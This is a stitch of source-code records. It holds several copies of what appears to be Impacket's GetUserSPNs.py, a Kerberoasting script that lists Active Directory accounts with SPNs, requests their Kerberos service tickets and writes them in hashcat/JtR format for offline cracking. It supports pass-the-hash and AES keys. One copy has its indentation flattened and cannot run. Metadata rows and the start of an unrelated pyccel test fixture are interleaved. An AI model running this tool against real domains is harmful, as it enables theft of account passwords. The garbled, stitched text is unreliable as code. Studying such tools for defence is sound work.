            rowMaxLen = max([len(row[i]) for row in items])
            colLen.append(max(rowMaxLen, len(col)))
        outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
        # Print header
        print outputFormat.format(*header)
        print ' '.join(['-' * itemLen for itemLen in colLen])
        # And now the rows
        for row in items:
            print outputFormat.format(*row)
    def __init__(self, username, password, domain, cmdLineOptions):
        """Store credentials/options and derive the LDAP base DN from the
        domain's DNS name.

        NOTE(review): `self.__outputFileName` and `self.__requestTGS` read
        the module-level `options` instead of `cmdLineOptions` -- the same
        object in practice when run as a script, but confirm before reusing
        this class as a library.
        """
        self.options = cmdLineOptions
        self.__username = username
        self.__password = password
        self.__domain = domain
        self.__lmhash = ''
        self.__nthash = ''
        self.__outputFileName = options.outputfile
        self.__aesKey = cmdLineOptions.aesKey
        self.__doKerberos = cmdLineOptions.k
        self.__target = None
        self.__requestTGS = options.request
        self.__kdcHost = cmdLineOptions.dc_ip
        self.__saveTGS = cmdLineOptions.save
        self.__requestUser = cmdLineOptions.request_user
        if cmdLineOptions.hashes is not None:
            self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
        # Create the baseDN
        domainParts = self.__domain.split('.')
        self.baseDN = ''
        for i in domainParts:
            self.baseDN += 'dc=%s,' % i
        # Remove last ','
        self.baseDN = self.baseDN[:-1]
    def getMachineName(self):
        """Return the DC's server name discovered through an anonymous SMB
        connection (used as the LDAP target when Kerberos auth is on).
        A failed anonymous login is only logged, not fatal."""
        if self.__kdcHost is not None:
            s = SMBConnection(self.__kdcHost, self.__kdcHost)
        else:
            s = SMBConnection(self.__domain, self.__domain)
        try:
            s.login('', '')
        except Exception:
            logging.debug('Error while anonymous logging into %s' % self.__domain)
        s.logoff()
        return s.getServerName()
    @staticmethod
    def getUnixTime(t):
        """Convert a Windows FILETIME value (100-ns ticks since 1601-01-01)
        to a Unix epoch timestamp."""
        t -= 116444736000000000
        t /= 10000000
        return t
    def getTGT(self):
        """Return a TGT as a dict {'KDC_REP', 'cipher', 'sessionKey'}:
        reuse the credential cache pointed to by KRB5CCNAME when it holds a
        matching krbtgt entry, otherwise request a fresh TGT from the KDC."""
        try:
            ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
        except:
            # No cache present
            pass
        else:
            # retrieve user and domain information from CCache file if needed
            if self.__domain == '':
                domain = ccache.principal.realm['data']
            else:
                domain = self.__domain
            logging.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
            principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
            creds = ccache.getCredential(principal)
            if creds is not None:
                TGT = creds.toTGT()
                logging.debug('Using TGT from cache')
                return TGT
            else:
                logging.debug("No valid credentials found in cache. ")
        # No TGT in cache, request it
        userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
        tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
                                                                unhexlify(self.__lmhash),
                                                                unhexlify(self.__nthash), self.__aesKey,
                                                                kdcHost=self.__kdcHost)
        TGT = {}
        TGT['KDC_REP'] = tgt
        TGT['cipher'] = cipher
        TGT['sessionKey'] = sessionKey
        return TGT
    def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn, fd=None):
        """Print (or write to `fd`) the TGS in JtR/hashcat $krb5tgs$ format;
        only RC4-HMAC (etype 23) tickets are supported.  When saving is
        enabled, also writes the raw ticket to <username>.ccache."""
        decodedTGS = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
        # According to RFC4757 the cipher part is like:
        # struct EDATA {
        #       struct HEADER {
        #               OCTET Checksum[16];
        #               OCTET Confounder[8];
        #       } Header;
        #       OCTET Data[0];
        # } edata;
        #
        # In short, we're interested in splitting the checksum and the rest of the encrypted data
        #
        if decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:
            entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
                constants.EncryptionTypes.rc4_hmac.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
                hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),
                hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))
            if fd is None:
                print entry
            else:
                fd.write(entry+'\n')
        else:
            logging.error('Skipping %s/%s due to incompatible e-type %d' % (
                decodedTGS['ticket']['sname']['name-string'][0], decodedTGS['ticket']['sname']['name-string'][1],
                decodedTGS['ticket']['enc-part']['etype']))
        if self.__saveTGS is True:
            # Save the ticket
            logging.debug('About to save TGS for %s' % username)
            ccache = CCache()
            try:
                ccache.fromTGS(tgs, oldSessionKey, sessionKey )
                ccache.saveFile('%s.ccache' % username)
            except Exception, e:
                logging.error(str(e))
    def run(self):
        """Bind to the DC over LDAP (falling back to LDAPS when the server
        demands stronger auth), search enabled normal accounts that carry a
        servicePrincipalName, print the results as a table and -- when
        requested -- fetch and output a TGS per account."""
        if self.__doKerberos:
            self.__target = self.getMachineName()
        else:
            if self.__kdcHost is not None:
                self.__target = self.__kdcHost
            else:
                self.__target = self.__domain
        # Connect to LDAP
        try:
            ldapConnection = ldap.LDAPConnection('ldap://%s'%self.__target, self.baseDN, self.__kdcHost)
            if self.__doKerberos is not True:
                ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
            else:
                ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
                                             self.__aesKey, kdcHost=self.__kdcHost)
        except ldap.LDAPSessionError, e:
            if str(e).find('strongerAuthRequired') >= 0:
                # We need to try SSL
                ldapConnection = ldap.LDAPConnection('ldaps://%s' % self.__target, self.baseDN, self.__kdcHost)
                if self.__doKerberos is not True:
                    ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
                else:
                    ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
                                                 self.__aesKey, kdcHost=self.__kdcHost)
            else:
                raise
        # Building the following filter:
        # (&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))
        # (servicePrincipalName=*)
        and0 = ldapasn1.Filter()
        and0['present'] = ldapasn1.Present('servicePrincipalName')
        # (UserAccountControl:1.2.840.113556.1.4.803:=512)
        and1 = ldapasn1.Filter()
        and1['extensibleMatch'] = ldapasn1.MatchingRuleAssertion()
        and1['extensibleMatch']['matchingRule'] = ldapasn1.MatchingRuleId('1.2.840.113556.1.4.803')
        and1['extensibleMatch']['type'] = ldapasn1.TypeDescription('UserAccountControl')
        and1['extensibleMatch']['matchValue'] = ldapasn1.matchValueAssertion(UF_NORMAL_ACCOUNT)
        and1['extensibleMatch']['dnAttributes'] = False
        # !(UserAccountControl:1.2.840.113556.1.4.803:=2)
        and2 = ldapasn1.Not()
        and2['notFilter'] = ldapasn1.Filter()
        and2['notFilter']['extensibleMatch'] = ldapasn1.MatchingRuleAssertion()
        and2['notFilter']['extensibleMatch']['matchingRule'] = ldapasn1.MatchingRuleId('1.2.840.113556.1.4.803')
        and2['notFilter']['extensibleMatch']['type'] = ldapasn1.TypeDescription('UserAccountControl')
        and2['notFilter']['extensibleMatch']['matchValue'] = ldapasn1.matchValueAssertion(UF_ACCOUNTDISABLE)
        and2['notFilter']['extensibleMatch']['dnAttributes'] = False
        searchFilter = ldapasn1.Filter()
        searchFilter['and'] = ldapasn1.And()
        searchFilter['and'][0] = and0
        searchFilter['and'][1] = and1
        # searchFilter['and'][2] = and2
        # Exception here, setting verifyConstraints to False so pyasn1 doesn't warn about incompatible tags
        searchFilter['and'].setComponentByPosition(2,and2, verifyConstraints=False)
        if self.__requestUser is not None:
            #(sAMAccountName:=userSuppliedName)
            logging.info('Gathering data for user %s' % self.__requestUser)
            and3 = ldapasn1.EqualityMatch()
            and3['attributeDesc'] = ldapasn1.AttributeDescription('sAMAccountName')
            and3['assertionValue'] = ldapasn1.AssertionValue(self.__requestUser)
            # searchFilter['and'][3] = and3
            # Exception here, setting verifyConstraints to False so pyasn1 doesn't warn about incompatible tags
            searchFilter['and'].setComponentByPosition(3, and3, verifyConstraints=False)
        try:
            resp = ldapConnection.search(searchFilter=searchFilter,
                                         attributes=['servicePrincipalName', 'sAMAccountName',
                                                     'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
                                         sizeLimit=999)
        except ldap.LDAPSearchError, e:
            if e.getErrorString().find('sizeLimitExceeded') >= 0:
                logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
                # We reached the sizeLimit, process the answers we have already and that's it. Until we implement
                # paged queries
                resp = e.getAnswers()
                pass
            else:
                raise
        answers = []
        logging.debug('Total of records returned %d' % len(resp))
        # Walk every returned entry, extracting the columns for the report.
        for item in resp:
            if isinstance(item, ldapasn1.SearchResultEntry) is not True:
                continue
            mustCommit = False
            sAMAccountName = ''
            memberOf = ''
            SPNs = []
            pwdLastSet = ''
            userAccountControl = 0
            lastLogon = 'N/A'
            try:
                for attribute in item['attributes']:
                    if attribute['type'] == 'sAMAccountName':
                        # Names ending in '$' are machine accounts -- skip them.
                        if str(attribute['vals'][0]).endswith('$') is False:
                            # User Account
                            sAMAccountName = str(attribute['vals'][0])
                            mustCommit = True
                    elif attribute['type'] == 'userAccountControl':
                        userAccountControl = str(attribute['vals'][0])
                    elif attribute['type'] == 'memberOf':
                        memberOf = str(attribute['vals'][0])
                    elif attribute['type'] == 'pwdLastSet':
                        if str(attribute['vals'][0]) == '0':
                            pwdLastSet = '<never>'
                        else:
                            pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                    elif attribute['type'] == 'lastLogon':
                        if str(attribute['vals'][0]) == '0':
                            lastLogon = '<never>'
                        else:
                            lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                    elif attribute['type'] == 'servicePrincipalName':
                        for spn in attribute['vals']:
                            SPNs.append(str(spn))
                if mustCommit is True:
                    if int(userAccountControl) & UF_ACCOUNTDISABLE:
                        logging.debug('Bypassing disabled account %s ' % sAMAccountName)
                    else:
                        for spn in SPNs:
                            answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon])
            except Exception, e:
                logging.error('Skipping item, cannot process due to error %s' % str(e))
                pass
        if len(answers)>0:
            self.printTable(answers, header=[ "ServicePrincipalName", "Name", "MemberOf", "PasswordLastSet", "LastLogon"])
            print '\n\n'
            if self.__requestTGS is True or self.__requestUser is not None:
                # Let's get unique user names and a SPN to request a TGS for
                users = dict( (vals[1], vals[0]) for vals in answers)
                # Get a TGT for the current user
                TGT = self.getTGT()
                if self.__outputFileName is not None:
                    fd = open(self.__outputFileName, 'w+')
                else:
                    fd = None
                for user, SPN in users.iteritems():
                    try:
                        serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
                        tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain,
                                                                                self.__kdcHost,
                                                                                TGT['KDC_REP'], TGT['cipher'],
                                                                                TGT['sessionKey'])
                        self.outputTGS(tgs, oldSessionKey, sessionKey, user, SPN, fd)
                    except Exception , e:
                        logging.error(str(e))
                if fd is not None:
                    fd.close()
        else:
            print "No entries found!"
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print version.BANNER
parser = argparse.ArgumentParser(add_help = True, description = "Queries target domain for SPNs that are running "
"under a user account")
parser.add_argument('target', action='store', help='domain/username[:password]')
parser.add_argument('-request', action='store_true', default='False', help='Requests TGS for users and output them '
'in JtR/hashcat format (default False)')
parser.add_argument('-request-user', action='store', metavar='username', help='Requests TGS for the SPN associated '
'to the user specified (just the username, no domain needed)')
parser.add_argument('-save', action='store_true', default='False', help='Saves TGS requested to disk. Format is '
'<username>.ccache. Auto selects -request')
parser.add_argument('-outputfile', action='store',
help='Output filename to write ciphers in JtR/hashcat format')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) '
'specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
# This is because I'm lazy with regex
# ToDo: We need to change the regex to fullfil domain/username[:password]
targetParam = options.target+'@'
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(targetParam).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if domain is '':
logging.critical('Domain should be specified!')
sys.exit(1)
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
if options.save is True or options.outputfile is not None:
options.request = True
try:
executer = GetUserSPNs(username, password, domain, options)
executer.run()
except Exception, e:
#import traceback
#print traceback.print_exc()
print str(e)
| 46.932401 | 161 | 0.568243 |
# will encrypt the ticket with the account the SPN is running under, this could be used for an offline
# bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.
# This is part of the kerberoast attack researched by Tim Medin (@timmedin) and detailed at
# https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
#
# Original idea of implementing this in Python belongs to @skelsec and his
# https://github.com/skelsec/PyKerberoast project
#
# This module provides a Python implementation for this attack, adding also the ability to PtH/Ticket/Key.
# Also, disabled accounts won't be shown.
# (play with userAccountControl)
#
import argparse
import logging
import os
import sys
from datetime import datetime
from binascii import hexlify, unhexlify
from pyasn1.codec.der import decoder
from impacket import version
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_NORMAL_ACCOUNT
from impacket.examples import logger
from impacket.krb5 import constants
from impacket.krb5.asn1 import TGS_REP
from impacket.krb5.ccache import CCache
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.krb5.types import Principal
from impacket.ldap import ldap, ldapasn1
from impacket.smbconnection import SMBConnection
class GetUserSPNs:
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print outputFormat.format(*header)
print ' '.join(['-' * itemLen for itemLen in colLen])
# And now the rows
for row in items:
print outputFormat.format(*row)
def __init__(self, username, password, domain, cmdLineOptions):
self.options = cmdLineOptions
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__outputFileName = options.outputfile
self.__aesKey = cmdLineOptions.aesKey
self.__doKerberos = cmdLineOptions.k
self.__target = None
self.__requestTGS = options.request
self.__kdcHost = cmdLineOptions.dc_ip
self.__saveTGS = cmdLineOptions.save
self.__requestUser = cmdLineOptions.request_user
if cmdLineOptions.hashes is not None:
self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
# Create the baseDN
domainParts = self.__domain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
def getMachineName(self):
if self.__kdcHost is not None:
s = SMBConnection(self.__kdcHost, self.__kdcHost)
else:
s = SMBConnection(self.__domain, self.__domain)
try:
s.login('', '')
except Exception:
logging.debug('Error while anonymous logging into %s' % self.__domain)
s.logoff()
return s.getServerName()
@staticmethod
def getUnixTime(t):
t -= 116444736000000000
t /= 10000000
return t
def getTGT(self):
try:
ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
except:
# No cache present
pass
else:
# retrieve user and domain information from CCache file if needed
if self.__domain == '':
domain = ccache.principal.realm['data']
else:
domain = self.__domain
logging.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is not None:
TGT = creds.toTGT()
logging.debug('Using TGT from cache')
return TGT
else:
logging.debug("No valid credentials found in cache. ")
# No TGT in cache, request it
userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
unhexlify(self.__lmhash),
unhexlify(self.__nthash), self.__aesKey,
kdcHost=self.__kdcHost)
TGT = {}
TGT['KDC_REP'] = tgt
TGT['cipher'] = cipher
TGT['sessionKey'] = sessionKey
return TGT
def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn, fd=None):
decodedTGS = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
# According to RFC4757 the cipher part is like:
# struct EDATA {
# struct HEADER {
# OCTET Checksum[16];
# OCTET Confounder[8];
# } Header;
# OCTET Data[0];
# } edata;
#
# In short, we're interested in splitting the checksum and the rest of the encrypted data
if decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:
entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
constants.EncryptionTypes.rc4_hmac.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),
hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))
if fd is None:
print entry
else:
fd.write(entry+'\n')
else:
logging.error('Skipping %s/%s due to incompatible e-type %d' % (
decodedTGS['ticket']['sname']['name-string'][0], decodedTGS['ticket']['sname']['name-string'][1],
decodedTGS['ticket']['enc-part']['etype']))
if self.__saveTGS is True:
logging.debug('About to save TGS for %s' % username)
ccache = CCache()
try:
ccache.fromTGS(tgs, oldSessionKey, sessionKey )
ccache.saveFile('%s.ccache' % username)
except Exception, e:
logging.error(str(e))
    def run(self):
        """Query the DC over LDAP for enabled user accounts that carry SPNs, print a
        summary table, and — when TGS output was requested — fetch a service ticket
        per unique user and emit it through outputTGS().
        """
        # Resolve which host to contact: Kerberos auth needs the DC's machine name,
        # otherwise prefer the explicit -dc-ip, falling back to the domain name.
        if self.__doKerberos:
            self.__target = self.getMachineName()
        else:
            if self.__kdcHost is not None:
                self.__target = self.__kdcHost
            else:
                self.__target = self.__domain
        # Bind over plain LDAP first; if the server rejects it with
        # 'strongerAuthRequired', retry the same authentication over LDAPS.
        try:
            ldapConnection = ldap.LDAPConnection('ldap://%s'%self.__target, self.baseDN, self.__kdcHost)
            if self.__doKerberos is not True:
                ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
            else:
                ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
                                             self.__aesKey, kdcHost=self.__kdcHost)
        except ldap.LDAPSessionError, e:
            if str(e).find('strongerAuthRequired') >= 0:
                # We need to try SSL
                ldapConnection = ldap.LDAPConnection('ldaps://%s' % self.__target, self.baseDN, self.__kdcHost)
                if self.__doKerberos is not True:
                    ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
                else:
                    ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
                                                 self.__aesKey, kdcHost=self.__kdcHost)
            else:
                raise
        # Build the search filter, roughly:
        #   (& (servicePrincipalName=*)
        #      (userAccountControl BIT_AND NORMAL_ACCOUNT)
        #      (! (userAccountControl BIT_AND ACCOUNTDISABLE)))
        # i.e. enabled normal user accounts that have at least one SPN set.
        and0 = ldapasn1.Filter()
        and0['present'] = ldapasn1.Present('servicePrincipalName')
        and1 = ldapasn1.Filter()
        and1['extensibleMatch'] = ldapasn1.MatchingRuleAssertion()
        # 1.2.840.113556.1.4.803 is Active Directory's LDAP_MATCHING_RULE_BIT_AND rule.
        and1['extensibleMatch']['matchingRule'] = ldapasn1.MatchingRuleId('1.2.840.113556.1.4.803')
        and1['extensibleMatch']['type'] = ldapasn1.TypeDescription('UserAccountControl')
        and1['extensibleMatch']['matchValue'] = ldapasn1.matchValueAssertion(UF_NORMAL_ACCOUNT)
        and1['extensibleMatch']['dnAttributes'] = False
        and2 = ldapasn1.Not()
        and2['notFilter'] = ldapasn1.Filter()
        and2['notFilter']['extensibleMatch'] = ldapasn1.MatchingRuleAssertion()
        and2['notFilter']['extensibleMatch']['matchingRule'] = ldapasn1.MatchingRuleId('1.2.840.113556.1.4.803')
        and2['notFilter']['extensibleMatch']['type'] = ldapasn1.TypeDescription('UserAccountControl')
        and2['notFilter']['extensibleMatch']['matchValue'] = ldapasn1.matchValueAssertion(UF_ACCOUNTDISABLE)
        and2['notFilter']['extensibleMatch']['dnAttributes'] = False
        searchFilter = ldapasn1.Filter()
        searchFilter['and'] = ldapasn1.And()
        searchFilter['and'][0] = and0
        searchFilter['and'][1] = and1
        searchFilter['and'].setComponentByPosition(2,and2, verifyConstraints=False)
        if self.__requestUser is not None:
            # Narrow the query to a single account: (sAMAccountName:=userSuppliedName)
            logging.info('Gathering data for user %s' % self.__requestUser)
            and3 = ldapasn1.EqualityMatch()
            and3['attributeDesc'] = ldapasn1.AttributeDescription('sAMAccountName')
            and3['assertionValue'] = ldapasn1.AssertionValue(self.__requestUser)
            # searchFilter['and'][3] = and3
            # Exception here, setting verifyConstraints to False so pyasn1 doesn't warn about incompatible tags
            searchFilter['and'].setComponentByPosition(3, and3, verifyConstraints=False)
        try:
            resp = ldapConnection.search(searchFilter=searchFilter,
                                         attributes=['servicePrincipalName', 'sAMAccountName',
                                                     'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
                                         sizeLimit=999)
        except ldap.LDAPSearchError, e:
            if e.getErrorString().find('sizeLimitExceeded') >= 0:
                logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
                # We hit the server-side size limit: process the partial answer set
                # we already received instead of failing (no paged queries yet).
                resp = e.getAnswers()
                pass
            else:
                raise
        answers = []
        logging.debug('Total of records returned %d' % len(resp))
        # Collect one [SPN, account, memberOf, pwdLastSet, lastLogon] row per SPN;
        # machine accounts (sAMAccountName ending in '$') are skipped.
        for item in resp:
            if isinstance(item, ldapasn1.SearchResultEntry) is not True:
                continue
            mustCommit = False
            sAMAccountName = ''
            memberOf = ''
            SPNs = []
            pwdLastSet = ''
            userAccountControl = 0
            lastLogon = 'N/A'
            try:
                for attribute in item['attributes']:
                    if attribute['type'] == 'sAMAccountName':
                        if str(attribute['vals'][0]).endswith('$') is False:
                            # User Account
                            sAMAccountName = str(attribute['vals'][0])
                            mustCommit = True
                    elif attribute['type'] == 'userAccountControl':
                        userAccountControl = str(attribute['vals'][0])
                    elif attribute['type'] == 'memberOf':
                        # NOTE(review): only the first memberOf value is kept — confirm
                        # that is intentional before relying on this column.
                        memberOf = str(attribute['vals'][0])
                    elif attribute['type'] == 'pwdLastSet':
                        # pwdLastSet/lastLogon are Windows FILETIME values; '0' means never.
                        if str(attribute['vals'][0]) == '0':
                            pwdLastSet = '<never>'
                        else:
                            pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                    elif attribute['type'] == 'lastLogon':
                        if str(attribute['vals'][0]) == '0':
                            lastLogon = '<never>'
                        else:
                            lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                    elif attribute['type'] == 'servicePrincipalName':
                        for spn in attribute['vals']:
                            SPNs.append(str(spn))
                if mustCommit is True:
                    if int(userAccountControl) & UF_ACCOUNTDISABLE:
                        # Belt-and-braces: the filter should already exclude disabled accounts.
                        logging.debug('Bypassing disabled account %s ' % sAMAccountName)
                    else:
                        for spn in SPNs:
                            answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon])
            except Exception, e:
                # One malformed entry must not abort processing of the rest.
                logging.error('Skipping item, cannot process due to error %s' % str(e))
                pass
        if len(answers)>0:
            self.printTable(answers, header=[ "ServicePrincipalName", "Name", "MemberOf", "PasswordLastSet", "LastLogon"])
            print '\n\n'
            if self.__requestTGS is True or self.__requestUser is not None:
                # Let's get unique user names and a SPN to request a TGS for
                # (the dict keeps only one SPN per user).
                users = dict( (vals[1], vals[0]) for vals in answers)
                TGT = self.getTGT()
                if self.__outputFileName is not None:
                    fd = open(self.__outputFileName, 'w+')
                else:
                    fd = None
                for user, SPN in users.iteritems():
                    try:
                        serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
                        tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain,
                                                                                self.__kdcHost,
                                                                                TGT['KDC_REP'], TGT['cipher'],
                                                                                TGT['sessionKey'])
                        self.outputTGS(tgs, oldSessionKey, sessionKey, user, SPN, fd)
                    except Exception , e:
                        # Keep going: a failure for one SPN should not abort the others.
                        logging.error(str(e))
                if fd is not None:
                    fd.close()
        else:
            print "No entries found!"
if __name__ == '__main__':
    # Script entry point: parse the impacket-style target spec
    # (domain/username[:password]@address), gather credentials, and run GetUserSPNs.
    logger.init()
    print version.BANNER
    parser = argparse.ArgumentParser(add_help = True, description = "Queries target domain for SPNs that are running "
                                                                    "under a user account")
    parser.add_argument('target', action='store', help='domain/username[:password]')
    # NOTE(review): default='False' is the *string* 'False' (which is truthy), not the
    # boolean False. It only behaves correctly because downstream code compares with
    # 'is True'. Confirm before "fixing" either side.
    parser.add_argument('-request', action='store_true', default='False', help='Requests TGS for users and output them '
                                                                               'in JtR/hashcat format (default False)')
    parser.add_argument('-request-user', action='store', metavar='username', help='Requests TGS for the SPN associated '
                                                                                  'to the user specified (just the username, no domain needed)')
    parser.add_argument('-save', action='store_true', default='False', help='Saves TGS requested to disk. Format is '
                                                                            '<username>.ccache. Auto selects -request')
    parser.add_argument('-outputfile', action='store',
                        help='Output filename to write ciphers in JtR/hashcat format')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
    group = parser.add_argument_group('authentication')
    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
                                                       '(KRB5CCNAME) based on target parameters. If valid credentials '
                                                       'cannot be found, it will use the ones specified in the command '
                                                       'line')
    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
                                                                            '(128 or 256 bits)')
    group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
                                                                             'ommited it use the domain part (FQDN) '
                                                                             'specified in the target parameter')
    # No arguments at all: show usage instead of failing on a missing positional.
    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)
    options = parser.parse_args()
    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)
    import re
    # ToDo: We need to change the regex to fullfil domain/username[:password]
    # The trailing '@' guarantees the optional "credentials@" part of the regex matches.
    targetParam = options.target+'@'
    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(targetParam).groups('')
    #In case the password contains '@'
    if '@' in address:
        password = password + '@' + address.rpartition('@')[0]
        address = address.rpartition('@')[2]
    # NOTE(review): `is ''` is an identity check that relies on CPython small-string
    # interning; `== ''` (or `not domain`) is the correct comparison.
    if domain is '':
        logging.critical('Domain should be specified!')
        sys.exit(1)
    # Prompt for a password only when no other credential source was supplied.
    if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
        from getpass import getpass
        password = getpass("Password:")
    if options.aesKey is not None:
        # Supplying an AES key implies Kerberos authentication.
        options.k = True
    if options.save is True or options.outputfile is not None:
        # Saving tickets / writing an output file only makes sense with -request.
        options.request = True
    try:
        executer = GetUserSPNs(username, password, domain, options)
        executer.run()
    except Exception, e:
        #import traceback
        #print traceback.print_exc()
        print str(e)
| false | true |
f72376b693b2c15acbb9f4539d2913c118aebefc | 617 | py | Python | tests/codegen/ccode/scripts/arrays_pointers.py | dina-fouad/pyccel | f4d919e673b400442b9c7b81212b6fbef749c7b7 | [
"MIT"
] | 206 | 2018-06-28T00:28:47.000Z | 2022-03-29T05:17:03.000Z | tests/codegen/ccode/scripts/arrays_pointers.py | dina-fouad/pyccel | f4d919e673b400442b9c7b81212b6fbef749c7b7 | [
"MIT"
] | 670 | 2018-07-23T11:02:24.000Z | 2022-03-30T07:28:05.000Z | tests/codegen/ccode/scripts/arrays_pointers.py | dina-fouad/pyccel | f4d919e673b400442b9c7b81212b6fbef749c7b7 | [
"MIT"
] | 19 | 2019-09-19T06:01:00.000Z | 2022-03-29T05:17:06.000Z | # pylint: disable=missing-function-docstring, missing-module-docstring/
#==============================================================================
def allocatable_to_pointer():
    """Codegen fixture: alias a locally allocated array so the target language
    must implement `c` as a pointer to the allocatable `a`.

    NOTE: the exact statement shape is the test subject (pyccel C codegen);
    do not restructure.
    """
    from numpy import array
    a = array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
    c = a #pylint:disable=unused-variable
def pointer_to_pointer():
